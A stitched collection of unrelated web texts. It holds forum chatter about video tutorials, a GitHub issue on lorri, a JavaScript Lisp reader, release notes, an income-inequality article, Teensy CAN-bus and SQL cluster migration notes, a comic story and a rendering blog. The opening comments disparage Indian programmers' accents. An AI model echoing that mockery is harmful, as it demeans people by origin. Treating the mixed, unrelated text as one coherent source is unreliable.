on there. I’m not even certain I have an account, I can’t remember making one. I'm pretty sure 90% of them aren't even programmers but just love to copy/paste and yell at people... There are a lot more videos by Indian programmers it seems. Sometimes what I am looking for there are only videos by Indian programmers. Sometimes the accent is hard to follow and I have to rewind a bunch of times. But to me it means that Indian programmers make a strong effort to be helpful. It's very generous. texting that other guy in your class about an hour before the lab is due This!! Jesus Christ, this!!! Every freaking time I think I've found something relevant or useful. English is native tongue The Brits would disagree, and the Indian accent is because of the accent of our native languages. I speak Gujarati, Hindi and English, and that is just one of the dozens spoken around. English isn't the first thing an Indian learns to speak after they're born. With them typing in notepad This is exactly why I have a hard rule against using videos as any kind of reference. They all seem to be just pure and utter shit. For me as a German, they are nearly unwatchable with the accent. some random tutorial with thick indian accent At some point you're just making offerings to an internet deity to deliver you a working function, and not always a benevolent one. Not to mention you can skim a text tutorial but have to do skipping roulette with a video (and deal with the buffering) Those need to die. Infact, the American accent is the one butchering the way English is meant to be spoken.
OPCFW_CODE
Accept packages from the commandline As I understand, currently lorri requires shell.nix. I often create .envrc files like use nix -p node10 when I need some simple project-specific environment without the full power of nix expressions. It would be nice if I could write in .envrc something like eval $(lorri direnv -p node10) and get all the benefits of cached lorri environments. You can already do that by passing --shell-file: > lorri direnv --help lorri-direnv 0.1.0 Graham Christensen<EMAIL_ADDRESS>Emit shell script intended to be evaluated as part of direnv's .envrc, via: `eval "$(lorri direnv)"` USAGE: lorri direnv [OPTIONS] FLAGS: -h, --help Prints help information -V, --version Prints version information OPTIONS: --shell-file <nix_file> The .nix file in the current directory to use [default: shell.nix] Subcommands have their own --help, so not all options are listed in lorri --help. Hi @Profpatsch. I know that I can use .nix files other than shell.nix with --shell-file, but that's not exactly what I wanted to do — I'd like to pass package names directly on the command line without a need to create any *.nix file, just like I can do it with nix-shell -p pkg1 pkg2. I'd like to pass package names directly on the command line without a need to create any *.nix file, just like I can do it with nix-shell -p pkg1 pkg2. Ah, hm, lorri has no concept of packages. Only .nix files. What would -p foo give you anyway that you cannot do with --shell-file foo/shell.nix? As I understand nix-shell generates a simple nix expression when a set of packages is passed on the command line, just it doesn't exist as a .nix file. It will make a difference for me for three reasons: simplicity, as most of the time I just need a set of packages without the full power of nix expressions I mostly use nix as a way to set up my local environment, so shell.nix shouldn't be committed to the version control, so I will have to globally gitignore it and use git add -f when it shouldn't be ignored. I have some direnv helpers that for example read NodeJS version from .nvmrc and select the correct node version with nix-shell -p. I would like to use lorri instead, but it requires a real .nix file. As a workaround I could auto-generate shell.nix (or, say, .envrc.nix to avoid name conflicts) from direnv helpers, but it would be much easier if I could just pass the package names to lorri directly. simplicity, as most of the time I just need a set of packages without the full power of nix expressions shell.nix does effectively the same as with import <nixpkgs> {}; mkShell { buildInputs = [ <interpolate argument list here> ]; } We provide lorri init, which generates that file for you. We could, in principle, add an --expression arguments which allows users to specify the expression on the command line instead of creating a (temporary) file first. I have some direnv helpers that for example read NodeJS version from .nvmrc and select the correct node version with nix-shell -p. I would like to use lorri instead, but it requires a real .nix file. Making lorri a drop-in for nix-shell is an interesting idea! I think in principle it’s possible, but I wouldn’t add it to the lorri binary itself, but as an optional wrapper script. Having an --expression argument would be great, thanks for re-opening.
GITHUB_ARCHIVE
var delimiters = {"(": true, ")": true, ";": true, "\r": true, "\n": true}; var whitespace = {" ": true, "\t": true, "\r": true, "\n": true}; var stream = function (_str, more) { return {pos: 0, string: _str, len: _35(_str), more: more}; }; var peek_char = function (s) { var ____id = s; var __pos = has(____id, "pos"); var __len = has(____id, "len"); var __string = has(____id, "string"); if (__pos < __len) { return char(__string, __pos); } }; var read_char = function (s) { var __c = peek_char(s); if (__c) { s.pos = s.pos + 1; return __c; } }; var skip_non_code = function (s) { while (true) { var __c1 = peek_char(s); if (nil63(__c1)) { break; } else { if (has63(whitespace, __c1)) { read_char(s); } else { if (__c1 === ";") { while (__c1 && !( __c1 === "\n")) { __c1 = read_char(s); } skip_non_code(s); } else { break; } } } } }; var read_table = {}; var eof = {}; var read = function (s) { skip_non_code(s); var __c2 = peek_char(s); if (is63(__c2)) { return (has(read_table, __c2) || has(read_table, ""))(s); } else { return eof; } }; var read_all = function (s) { var __l = []; while (true) { var __form = read(s); if (__form === eof) { break; } add(__l, __form); } return __l; }; read_string = function (_str, more) { var __x = read(stream(_str, more)); if (!( __x === eof)) { return __x; } }; var key63 = function (atom) { return string63(atom) && _35(atom) > 1 && char(atom, edge(atom)) === ":"; }; var flag63 = function (atom) { return string63(atom) && _35(atom) > 1 && char(atom, 0) === ":"; }; var expected = function (s, c) { if (is63(s.more)) { return s.more; } else { throw new Error("Expected " + c + " at " + s.pos); } }; var wrap = function (s, x) { var __y = read(s); if (__y === s.more) { return __y; } else { return [x, __y]; } }; var hex_prefix63 = function (_str) { var __e; if (code(_str, 0) === 45) { __e = 1; } else { __e = 0; } var __i = __e; var __id1 = code(_str, __i) === 48; var __e1; if (__id1) { __i = __i + 1; var __n = code(_str, __i); __e1 = __n === 120 || __n === 88; } else { __e1 = __id1; } return __e1; }; var maybe_number = function (_str) { if (hex_prefix63(_str)) { return parseInt(_str, 16); } else { if (number_code63(code(_str, edge(_str)))) { return number(_str); } } }; var real63 = function (x) { return number63(x) && ! nan63(x) && ! inf63(x); }; read_table[""] = function (s) { var ___str = ""; while (true) { var __c3 = peek_char(s); if (__c3 && (! has63(whitespace, __c3) && ! has63(delimiters, __c3))) { ___str = ___str + read_char(s); } else { break; } } if (___str === "true") { return true; } else { if (___str === "false") { return false; } else { var __n1 = maybe_number(___str); if (real63(__n1)) { return __n1; } else { return ___str; } } } }; read_table["("] = function (s) { read_char(s); var __r16 = undefined; var __l1 = []; while (nil63(__r16)) { skip_non_code(s); var __c4 = peek_char(s); if (__c4 === ")") { read_char(s); __r16 = __l1; } else { if (nil63(__c4)) { __r16 = expected(s, ")"); } else { var __x2 = read(s); if (key63(__x2)) { var __k = clip(__x2, 0, edge(__x2)); var __v = read(s); __l1 = object(__l1); __l1[__k] = __v; } else { if (flag63(__x2)) { __l1 = object(__l1); __l1[clip(__x2, 1)] = true; } else { add(__l1, __x2); } } } } } return __r16; }; read_table[")"] = function (s) { throw new Error("Unexpected ) at " + s.pos); }; read_table["\""] = function (s) { read_char(s); var __r19 = undefined; var ___str1 = "\""; while (nil63(__r19)) { var __c5 = peek_char(s); if (__c5 === "\"") { __r19 = ___str1 + read_char(s); } else { if (nil63(__c5)) { __r19 = expected(s, "\""); } else { if (__c5 === "\\") { ___str1 = ___str1 + read_char(s); } ___str1 = ___str1 + read_char(s); } } } return __r19; }; read_table["|"] = function (s) { read_char(s); var __r21 = undefined; var ___str2 = "|"; while (nil63(__r21)) { var __c6 = peek_char(s); if (__c6 === "|") { __r21 = ___str2 + read_char(s); } else { if (nil63(__c6)) { __r21 = expected(s, "|"); } else { ___str2 = ___str2 + read_char(s); } } } return __r21; }; read_table["'"] = function (s) { read_char(s); return wrap(s, "quote"); }; read_table["`"] = function (s) { read_char(s); return wrap(s, "quasiquote"); }; read_table[","] = function (s) { read_char(s); if (peek_char(s) === "@") { read_char(s); return wrap(s, "unquote-splicing"); } else { return wrap(s, "unquote"); } }; exports.stream = stream; exports.read = read; exports["read-all"] = read_all; exports.read_all = read_all; exports["read-string"] = read_string; exports.read_string = read_string; exports["read-table"] = read_table; exports.read_table = read_table;
STACK_EDU
Hey guys. I unfortunately have a bit of bad news. My very first car is finally reaching its end after owning it for a couple years. (It's a used car that's 12 years old.) I sent it in to the repair shop and it's going to cost over half of my savings to get it repaired. At that point it's not even worth it, so I'm going to have to buy a new used car. The problem is this is going to cost a LOT of money. I don't use my car often, I only use it to pick up/drop off my little sister to and from school, and the occasional grocery trip or fast food stop. If I don't get more support in these upcoming months, I will most likely have to get a part time job of some sort, thus resulting in fewer and fewer remixes, and honestly I do not want that. I love making remixes for you guys nearly weekly and it would pain me greatly to have to stop. If you or someone you know have any possible way of supporting me, whether it's Patreon, commissioning me, buying my Undertale album, or just straight up donating to my paypal, it would honestly mean the world to me and every single little bit will add up. If everyone gave even a dollar that would be more than enough for my situation. If you can't do any of these, sharing my message to others would help immensley. There are links down below to everything I mentioned. Thank you for taking the time to read this and please enjoy the remix. - [HELP SUPPORT FUNDS FOR A NEW CAR VVVVVV]** ➤Donations: https://www.paypal.me/retrospecter ➤Patreon: https://www.patreon.com/retrospecter ➤Commissions: http://bit.ly/2yGmXBu Undertale Album: ➤iTunes: http://apple.co/2kBXQZr ➤Google Play: http://bit.ly/2kC4wH0 ➤Spotify: http://bit.ly/2jMt9ws ►Main art: http://bit.ly/2hT7Bj0 http://bit.ly/2zEwxmh ►Retro fanart: https://twitter.com/ShadeEn_p/status/919754019383455750 ►Animated Retro Icon by: https://twitter.com/spicybu ►MP3: https://soundcloud.com/retro_specter/cupheadfloral-fury-remix-retrospecter [OTHER SOCIAL MEDIA LINKS] ►DISCORD: https://discord.gg/retrospecter ►SUBSCRIBE: http://bit.ly/1NHd09J ►EMAIL (for business inquiries): firstname.lastname@example.org ►TWITTER: https://twitter.com/TheRetroSpecter ►TWITCH: https://www.twitch.tv/theretrospecter ►DEVIANTART: http://retro-specter.deviantart.com/ ►SOUNDCLOUD: https://soundcloud.com/retro_specter ►TUMBLR: https://theretrospecter.tumblr.com/ ►STEAM: https://steamcommunity.com/groups/TheRetroSpecter
OPCFW_CODE
|Home Software category Just in softwares Submit a program Contact us Link to us| Home > Development::C / C / C# > Stimulsoft Reports.Wpf with Source Code 2009.1 Stimulsoft Reports.Wpf with Source Code 2009.1 Stimulsoft Reports.Wpf is a powerful reporting tool for WPFCompany: Stimulsoft Platform: Win98,WinME,WinXP,WinNT 4.x,Windows2000,Windows2003 Size: 12553 KB Price: USD $999.95 Release Date: 2009-06-29 Category: Development::C / C / C# WPF is the Windows Presentation Foundation platform. Stimulsoft Reports.Wpf is the reporting tool that is developed for Windows Presentation Foundation. Do you need a reporting tool for WPF? No need to surf the internet - use Stimulsoft Reports.Wpf. All the power of WPF is used. Rich abilities of rendering, viewing, printing and exporting reports - and all this is Stimulsoft Reports.Wpf. wpf reporting tool reporting tool wpf framework report generator report free report controls free controls source codes Stimulsoft Reports.Wpf with Source Code Related Titles:Falco Free XLS Library 4.7 - Free Excel Library for Saving/Loading. VC++. Delphi. Falco Free Animated GIF Library 3.7 - Loading and Save. C++ and Delphi samples. Show Animated GIF. Delphi and VC++. Falco Free Script Processor 4.1 - Falco Free Script Processor Library. VC++. Delphi. Entity Developer for NHibernate 5.5 - Powerful visual NHibernate designer and code and mapping generator Entity Developer for Entity Framework 5.5 - Visual model designer and code generation tool for ADO.NET Entity Framework PDF Metamorphosis .Net 18.104.22.168 - HTML to PDF, RTF to PDF with managed C# library ? PDF Metamorphosis .Net RTF to HTML DLL .Net 22.214.171.124 - RTF to HTML DLL .Net Software abtoVNC Android Viewer SDK 1.4 - abtoVNC viewer SDK for Android. Remote desktop viewer for Android tool MTuner 2012.4 - C/C++ Memory profiler and analyzer with multi platform support Virtual Camera SDK 1.1 - Fake webcam software Virtual Camera SDK. Build custom virtual camera tool AthTek Code to FlowChart 2.0 - Automatically generate elegant flowchart or NS chart, to let code visual. abtoVNC iOS Viewer SDK 2.0 - abtoVNC Viewer for iOS SDK. Create remote desktop software for iOS devices Audio & Multimedia Business Communications Desktop Development Dwg to pdf Education Dwg Converter Games & Entertainment Graphic Apps Convert PDF to DWG Home & Hobby Network & Internet News Security & Privacy Servers System Utilities Web Development Others Copyright © 2000 - 2013 FreeSharewareCenter.com - Freeware and Shareware Download Center. All Rights Reserved.
OPCFW_CODE
Thanks to all the millions of Air Hockey players out there! We dragged Air Hockey, kicking and screaming, into iOS 10 happiness. As you know, Air Hockey's been around a while. You wouldn't believe the mess we found in there. So, we ripped off some bandages, stripped out the bailing wire, and had to melt off some duct tape - but here it is! Here's what's new: - 64 BITS OF GOODNESS! You won't see that warning about the developer needing to do an update anymore. Air Hockey, however, still runs exactly as awesomely fast as it ever did. - Added support for iPad Pro along with all the latest iPhone models & screen sizes. - Melted & reformed the menu code. (We'll add that replay button some day...it didn't make this version though.) - Taught the AI some new tricks. The computer player is now a little smarter/different and better at using the whole table. - Reflowed the goal detection logic to make sure we always catch those sneaky pucks. - Made the Air Hockey logo shiny and happy again...and it sits were we told it to. - Fixed the middle-of-the-screen pause screen double tap button placement. It was trying to get away. - Fancied up the menu background translucent coloring a bit. - New launch screen. Some devices & iOS versions saw some odd behavior in the last version. No more! - Reworked the device rotation code. You absolutely won't notice a difference, but it looks so much nicer under the hood. - OK. Would you believe that until now Air Hockey still used a modified version of the way-long-gone OpenFeint to handle GameCenterkwscnmrk It was messy. MESSY. We had to use a chainsaw and leaf blower, but it's all gone & replaced with sweet native Game Center code. (Please please let us know if you can find any Game Center, ummm, "integration issues" that are still hanging around.) - Did some really minor graphics tweaks in a couple places. There was a spec that was a quarter pixel off. Kicked it! - Killed some sound bugs. - So many little odds & ends that we forgot them all. We did stuff. It was good. There was much rejoicing. Secret developer note from days of old: Did you know that the goal sounds in Air Hockey were recorded by sliding a plastic air hockey puck across a granite kitchen counter top into a glass mixing bowl with a wash cloth in itkwscnmrk It took about 100 tries plus some editing to get the few goal sounds we use in the game. Those were the days!
OPCFW_CODE
You have probably seen the recent headlines saying that US income inequality has reached a 50-year high. They are based on the Census Bureau’s latest report on Income and Poverty in the United States, published last month. The Census Bureau’s data, however, ignore taxes, as well as non-cash benefits such as Medicare. They measure inequality in a hypothetical tax-free world. The data include cash benefits (such as unemployment benefits and social security), but they ignore non-cash benefits (such as, importantly, health benefits, as well as food stamps and subsidized housing). And they measure income before all taxes and social security fees are taken out. In other words, the Census Bureau inequality measure ignores the impact of the redistribution policies we have put in place to reduce inequality. Therefore, it makes a misleading basis for a policy debate. Yet most discussions of income inequality seem to be based on pre-tax income measures. A better starting point would be to ask: “how well are income redistribution policies working, and what else should we do?” The Congressional Budget Office (CBO) publishes data on income inequality after taxes and transfers; these data paint a different picture when compared with the Census Bureau’s data. Note that the latest CBO report, published last July, has data only from 1979 and up to 2016, whereas the Census Bureau’s data go to 2018 (and start in 1967); in the comparison we are therefore missing the developments of the last two years. Inequality after taxes and transfers increased sharply between 1979 and 1986. It dropped through the mid-1990s, then rose again. But for the last twenty years (1997-2016), income inequality after taxes and transfers has remained broadly unchanged. In fact it was lower in 2016 than in 1986. The chart below shows the CBO measure of inequality, after taxes and transfers, and compares it to the Census Bureau measure, which ignores taxes and non-cash benefits. Both are Gini coefficients, so a value of 0 would represent perfect equality, and a value of 1 maximum inequality (all income going to one individual) This does not mean that inequality is not high, or that it’s not a problem. We might want to reduce it back to the levels of 1979, or of the mid-1990s. However, it is simply not true that income inequality has gotten worse over the last twenty years (again, with the caveat that the CBO does not have post-tax data for the last two years). Over the last two decades, taxes and social programs have done exactly what they were designed to do: they kept inequality largely in check, offsetting a widening disparity in pre-tax incomes. This is extremely important because data on income inequality inform our public debate on redistribution policies. And to see how well our redistribution policies are working, we need to look at incomes after taxes and transfers. We care about differences in standards of living, and these are based on incomes after taxes and transfers. We can address the inequality in post-taxes-and-transfers income with additional changes to taxes and social benefits. Of course, however, that will not change inequality in pre-tax income. Inequality in pre-tax incomes can give us valuable insights into what is happening in our economy, for example the changing market value of education levels and skills; it can raise questions on corporate governance, as when looking at CEO pays in the US versus other advanced economies. But it does not tell us what’s happening to inequality in living standards. We should always debate the degree of income inequality that we are willing to tolerate as a society. It is a political choice that needs to balance considerations of equity and economic incentives. But the debate must start from measures of the inequality we still have after all the actions we have already taken to reduce it—it cannot start by pretending that there are no taxes and social benefits.
OPCFW_CODE
OOKABOOKA!!!!!!! The battlecry of the dreaded OOKABOOKA is all an unprepared adventurer will hear before he/she is ripped apart, stabbed, decapitated, incapacitated, incapacitated and decapitated, crushed, or generally killed. Only one man has ever lived to see them, and here he is, DOCTOR MUH!!! DOCTOR MUH: What? Interviewer: The OOKABOOKA? DOCTOR MUH: Come again? Interviewer: Ugh, THE OKKABOOKA!!! DOCTOR MUH: WHAT!? WHERE!? *pulls out glock* Interviewer: OH MY GOD! DOCTOR MUH: COME ON OUT, OOKABOOKA! I GOT A GLOCK FOR YOU! Interviewer: There's no OOKABOOKA! DOCTOR MUH: What? Oh, no OOKABOOKA... um... you won't tell security will you? Interviewer: Not if you put that away and we can carry on with the interview... DOCTOR MUH: Capital! Now, what did you want to know? Interviewer: How did you find the OOKABOOKA? DOCTOR MUH: Oh, that's quite the tale, I was on an expedition with my two colleagues Doctor Faiklicence and Professor Glass and my pet Poptop , Moomuh on a high threat level planet called Sheeba. We were exploring its dense jungles with three armed guards when we heard somebody yell "OOKABOOKA!!!!!!" scaring one of our guards into shooting Prof. Glass in the foot. I'm guessing Moomuh was scared, because he was chewing on my arm. Interviewer: Ah, that explains your arm being gone... DOCTOR MUH: DON'T STARE AT IT! *sobs* Interviewer: Ok, i won't... now you were saying? DOCTOR MUH: Oh, yes... um... Like I was saying, I served in solar war VII as a gunner on the ship Howitzer II and- Interviewer: The OOKABOOKA? DOCTOR MUH: WHAT!? HERE!? *Pulls out Assault Rifle* Interviewer: NOOOOO!!!! DOCTOR MUH: COME ON OUT OOKABOOKA! I GOT SOME INCENDIARY ROUNDS READY FOR YOU!! Interviewer: THE OOKABOOKA ARE NOT HERE!! DOCTOR MUH: Oh, you sure? Interviewer: YES! DOCTOR MUH: Ok, so where was I... oh yes, As Moomuh was chewing on my arm and Glass was jumping around like a lunatic over his wounded foot, Faiklicence was noticing something mving towards us. I saw it too, it looked like an oversized Avian with forks for arms, ONLY THEY WEREN'T FORKS!!!!! Interviewer: Ok, um... appearance, check. What did it do? DOCTOR MUH: IT KILLED MY WHOLE RESEARCH PARTY, THAT'S WHAT IT DID!!! Interviewer: mmhm... so HOW did it kill them? DOCTOR MUH: Using a variety of attacks, of course It took down Glass as he was flailing about with a pounce attack, which was quite bad news for his fiance, who is now Mrs. Muh. Teehee... So, continuing, it managed to stun our armed guards by shouting its battlecry, OOKABOOKA!!!!! Interviewer: What was that? seemed a bit too loud to come from you... DOCTOR MUH: SPECIAL EFFECTS!!!! Interviewer: Um... ok... So, it stunned them? DOCTOR MUH: Yes! It stunned them and started slashing them apart with its deadly forks! And just when Moomah decided to let go of my arm, it pounced him! My poor little poptop! I managed to get out my trusty little pistol here, its this one, the one in my hand, and put some lead in it, but just as i wasted the magazine, IT ATE MOOMAH'S CORPSE! It restored its health by feeding on the little monster i planned to mount! Interviewer: O_O Um, well... do you think any will ever be trained or tamed? DOCTOR MUH: Possibly, but they are feral beasts, a tamable one will probably be as rare as it is to see one. Interviewer: Hm. OOKABOOKA: OOKABOOKA!!!!! Interviewer: OH MY GOD!!!! DOCTOR MUH: I GOT IT! *Pulls out Rocket Launcher* Interviewer: NO! NOT THAT! ANYTHING BUT- _____________________________________________________________________________________________ OOKABOOKAS HAVE TAKEN OVER THE BROADCAST STATION, YOU ARE NOW WATCHING OOKABOOKA TV OOKABOOKA: OOKABOOKA OOKABOOKA OOKABOOKA. OOKABOOKA: OOKABOOKA, OOKABOOKA. OKKABOOKA: OOKA! OOKABOOKA! OOKABOOKA: ookabooka... Thank you for watching OOKA Time, with OOKABOOKA.
OPCFW_CODE
CAN-BUS Hello, i plan to use Teensy 4.0 as an gateway between two devices in my car. I would like to ask, if You plan to implement CAN bus RX pin as an wake pin, or should i use digital pin driver? Thank You Try to use digital.pinMode(23, INPUT, RISING); on your Rx pin (I use CAN1 on the T4) This will work only in hibernate mode. Otherwise, you will need to reinitialise your CAN library upon wakeup from sleep or deepsleep mode. Give that a try and report back. david, thanks. I am waking Teensy by ERR output from TJA1055. That pin indicates start of frame on bus. My sketch is based on bi directional forward example of FlexCAN library for T4. Whenever valid message is received on "car" side, i preload one variable, that decrements every millisecond. Then, when car goes to sleep, the variable gets to zero, but before it does, i put all three TJA1055 to sleep and then, i call Snooze.deepSleep(config_teensy40). config_teensy40 has digital and usb loaded. When "car side" TJA1055 indicates begin of transmission by pulling its ERR pin down, Teensy wakes up, enables all three TJA1055 and starts forwarding. But sometimes Teensy gets frozen, in various times after wake up. It never freezes when You power it up. But only after wake. The same happens sporadically when i configure additional pin and put button to it. Teensy wakes up and then freezes. Only way to get it run is to unplug power and plug it back again. Need to say that even when Teensy runs as it should, means does not freeze, when i press the button, it freezes at that moment. I have used MsTimer2, which is ISR based to flash LED to see, if, when Teensy freezes, my program is not stuck somewhere. Both MsTimer2 stops. By the way, when i tried hibernate sketch hibernate_all_wakeups, i am not able to wake the Teensy. So that is why i did not try hibernate, but deepSleep. PSA_GW_NAC_08A.txt I'm a bit behind in these issues as of late, (kids school things). I'm hoping to get back to Snooze soon and I'll be taking a look at this. Many thanks. Maybe if i call detachInterrupt on those two pins, it might help. Then reattach it before entering sleep. I am using Arduino 1.8.9 and Teensyduino 1.5.3 Seems like this approach helped: ` digital.pinMode(TJA_MASTER_ERR, INPUT, FALLING); //TJA_MASTER_ERR, mode, type digital.pinMode(IN_DEBUG, INPUT_PULLUP, FALLING); //TJA_MASTER_ERR, mode, type Snooze.deepSleep(config_teensy40); // return module that woke processor detachInterrupt(digitalPinToInterrupt(TJA_MASTER_ERR)); detachInterrupt(digitalPinToInterrupt(IN_DEBUG));` @dufi2profor I'm using the TI SN65HVD230, but I just had a look at the TJA1005 and it looks interesting - do you mind sharing a schematic of how you have it connected to the T4 with the wakeup and sleep functions? Sure, i will draw the schema in KiCad and share then. I have been using in past MCP2551, but that one, as part of high speed can group, has different recessive and dominant states. As a result i found the output on RX pin inverted. Looked strange to me and then i looked in my radio (Peugeot 3008) and found this TJA1055. Low speed, fault tolerant. But different idle and dominant states. I would not use control of sleep functions on those transcievers if i did not want the lowest current as possible and when all three TJAs are "sleeping", it makes current drop by at least 3 mA in total, So my current setup, when using deepSleep draws 5 mA, which is okay in car i think. Actually, I just saw the 1055 limited to 125Kb/s baud rate, I'll stick with the SN65HVD230 in this case as I need 500Kb/s. I put the 230 into sleep mode by default and pull the mode pin low when the Teensy is awake to bring it to life. I haven't measured consumption, but I'm hoping for 3-1mA if not less in Hibernate mode. Yes, that is the only drawback of TJA, but i need it for my infotainment project in my Peugeot. Had been using that MCP2551, but only as listen only mode on my Peugeot "body" can which is running at 500 Kb/s. Here is schematic diagram of what i have on breadboard now. SCH_CAN_ISOL_T4.pdf
GITHUB_ARCHIVE
Serious question? Is this Micheal Olowakandi.Originally posted by <b>FatDaddy</b>! Yes. Of course by stats. When he plays defense, he doesn't want to get close to the opponents because he wanted to protect himself. At this moment his stats are more important than wins. Clippers lost because Brand and Miller suck. Yea Miller and Brand suck how long it take you to come up with that one?Originally posted by <b>THE'clip'SHOW</b>! Serious question? Is this Micheal Olowakandi. You should be practicing right now! and I hope you enjoy the humidity in Miami. PLEASE IGNORE,Originally posted by <b>FatDaddy</b>! According to ESPN.com, Kandi is the 2nd best center. Coach Gently compared him with Wilt. If you guys read the articles, you will understand he is worth $20 Million/year. All of us should believe the experts in ESPN.com. What is the Clippers problem? Can I say all of the wins belong to Kandi and all of the loss belong to Brand and Miller......? Thats a nice way of saying Kandi is and most likely never will be close to Wilt.Originally posted by <b>FatDaddy</b>! Copy from ESPN.com "I think he will continue to work at it and get better," Clippers coach Alvin Gentry said. "If you are asking me is he going to get better than Wilt Chamberlain, I don't know. But I think he is going to be a very effective player in this league for a lot of years." I don't think he is worth $20M but most teams would be glad to take him for $20. Even if he was the CBA won't allow him to get 20M a year. The max on a 7 year deal for a player of Kandi's experience is around 100M total isn't it?Originally posted by <b>FatDaddy</b>! Copy from ESPN.com It seems inconceiveable that the Clippers would allow Olowokandi to escape, given his reccent production and what could be his future production. But stranger things have happened. And, in a world where it seems Jason Kidd is likely to remain in New Jersey and Tim Duncan is likely to stay in San Antonio, the next-best free agent is the next-best center. next-best free agent (Kandi) is the next-best center. here is my response: best center worst $20/year Originally posted by <b>JoeF</b>! ,,, most teams would be glad to take him for $20 I mean, how good can coach 'Gently' be if you don't even know his name?Originally posted by <b>FatDaddy</b>! ESPN.com rating on kandi is the most rediculous ever in the NBA history. Why Jeff Van Gundy? They have Gently now. Let me tell you, Clippers have noboby is better than Payton or Lewis and have nobody is better than Yao or Francis. All Clippers starters are overated!!!!!
OPCFW_CODE
We're moving our Dev environment to a new domain for some unfathomable corporate reason, and it's going to be a major headache. Among our 20+ SQL Servers in the environment, we've got a few SQL 2005 clusters. According to Microsoft, we can't move them without uninstalling SQL. Needless to say, this would add more pain to the migration process. It wouldn't be the end of the world, but this is weekend work, and uninstalling and re-installing a couple active/active SQL clusters is just the thing to turn 1 day of work into 2+. However, I think they're wrong. I built two virtual machines on VMWare Server, added them to a cluster (see Repeatable Read for instructions on creating shared disks in VMWare) on our current domain, and created some databases. Verified failover capability and connectivity. Then I moved both nodes to the new domain using the following steps: 1) Take all cluster resources offline (except the quorum, which cannot be taken offline) 2) Stop the cluster service on both nodes 3) Change the cluster service startup type to Manual 4) Change the domain of each machine to the new domain and reboot 5) After reboot, on each machine, change the cluster and SQL service accounts to accounts in the new domain 6) Run gpedit.msc or otherwise access Local Security Policy Settings (see below), and grant the following rights: Cluster Service Account Act as part of the operating system Adjust memory quotas for a process Increase scheduling priority Manage auditing and security log Restore files and directories SQL Service Account Adjust memory quotas for a process Lock pages in memory Log on as a batch job Log on as a service Replace a process level token 7) Add the cluster and SQL service accounts to the local Adminstrators group. NOTE: This should not be necessary for SQL, and I will update this with the minimum required permissions as soon as I sort them out. It is necessary for the cluster account, however. 8) Start the cluster service on both machines 9) Bring cluster resources online 10) Go enjoy the rest of your weekend If you missed some permissions, the cluster service will likely fail to start with an error 7023 or 1321, and will helpfully output an error in the system log with eventId 1234 that contains a list of the necessary user rights that still need to be assigned. Now that's error reporting! Comprehensive testing is still pending, but the preliminary results look good. After this process, SQL Server comes online on my test cluster, as do SQL Agent and Fulltext. I don't have any machines on the new domain with SQL Management Studio installed, but I could connect to SQL using osql directly on one of the cluster nodes. If anyone out there has any different experiences or comments, I'd love to hear them. My previous post left out one small but significant detail: the domain groups under which the SQL Server service accounts run. When one installs SQL 2005 on a cluster, the setup program requires domain groups to be entered for each service account. So for example: SQL Server service account: OLDDOMAIN\SQLService SQL Agent service account: OLDDOMAIN\SQLAgentService SQL Browser service account: OLDDOMAIN\SQLBrowserService Then it comes time to move your cluster, and you've followed my steps above or done your own hacking, and you've changed the service accounts to NEWDOMAIN\SQLService and so on. But the domain groups remain the same. Your cluster will come online and fail over and operate fine, but you won't be able to change it. This was made evident when I tried to add a node to an existing cluster after moving it to a new domain. It gave me a message like "Cannot add NEWDOMAIN\SQLService to OLDDOMAIN\SQLServiceGroup." Arrgh. Microsoft had already claimed that this was not supported, so I suppose I shouldn't have been surprised. So I started searching for the reference to OLDDOMAIN\SQLServiceGroup. And couldn't find it. Not in a config file, or a system table (I know, that was dumb, but I was desperate), or the registry, where I expected to find it. Eventually, I started combing the registry key by key within the SQL hives and came across this in HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.1\Setup... (okay, I tried to upload another image here to illustrate, but Blogger hates me, so screw it.) The keys AGTGroup, FTSGroup, and SQLGroup contain the SIDs for whatever OLDDOMAIN groups you set up when installing SQL. Find the SIDs for your new domain groups (the VBScript below is how I did it), enter those in place of the old ones, restart SQL, and your cluster is moved. You should now be able to add or remove nodes, install hotfixes, etc. You'll need to update the SIDs for each SQL installation (MSSQL.2, MSSQL.3, etc.) As with any unsupported operation, your mileage may vary, but let me know if you have a different experience with this or you run into additional problems.
OPCFW_CODE
After succumbing to a bit of a slump in research productivity over the last week or two it feels great to be making progress again. Finally I have a fully functional implementation of Bidirectional path tracing with some basic multiple importance sampling for the path weights. To celebrate having this new renderer in the code base I decided to have another crack at implementing a ceramic like shader. In the past I had modeled this material in geometry by placing a diffuse textured sphere inside an ever so slightly larger glass sphere to model the glaze/polish of the material. However, this method was a clunky approximation and severely limited the complexity of the models which it could be applied to. This time I modeled a blended BRDF between a lambertian diffuse under-layer and an anisotropic glossy over-layer to represent the painted ceramic glaze. The amount of each BRDF used for each interaction is modulated by a Fresnel term on the incident direction. This means that looking straight at the surface will show mostly the coloured under-layer, while looking at glancing angles will show mostly the glossy over-layer. The final, most important, part of this shader however is the bump map applied to it. Originally I rendered this scene without bump mapping, and while the material seemed plausible it looked almost too perfect. To break up the edges of reflections and to allow the surface of the material to “grab” onto a bit more light the effect of the material becomes and order of magnitude more convincing. Just a quick render after implementing an Anisotropic Metal material in my renderer. The test scene was inspired by one I saw on Kevin Beason’s worklog blog. Pressing onwards with research after a short break to play with the Xeon Phi rack, I’ve been working on visualizations for Monte Carlo Simulations. My aim is to have a clean and concise means of displaying (and therefore being able to infer relationships from) the data of higher dimensional probability distributions. The video below shows one such visualization where a 2D Gaussian PDF has been simulated using Hamiltonian Dynamics. The two 3D meshes represent the reconstructed sample volume as a 2D histogram of values rescaled to the original function. The error between the reconstruction and the original curves is shown through the colour of the surface where hot spots denote areas of high error. The mean sq error for the whole distribution is displayed in the top right on a logarithmic scale. An algorithm which converges in an ideal manner will graph it’s error as a straight line on the log scale. The sample X and Y graphs in the bottom right allow us to visualize where the samples are being chosen as the simulation runs and infer about whether samples are being chosen independently of one another. The centre-bottom graph simply gives us a trajectory of samples over the course of the simulation. This allows us to additionally catch if an algorithm is prone to getting stuck in local maxima’s. The above video shows the same simulation run with a basic Metropolis Hastings algorithm. Here the proposal sample y attributes are chosen independently of one another, meaning this is not a Gibbs Sampler. Although I intend to implement one within the test framework for comparisons sake soon. A key difference between the two simulations here is to note the Path Space Trajectory shown in the bottom-centre graph and how it relates to the Sample Dimension Space graphs shown on the middle & bottom-right. Hamiltonian Dynamics chooses sets of variables where the y elements are highly dependent on one another within a coordinate, yet almost entirely independent of other pairs of coordinates within the Path Space. Metropolis Hastings on the other 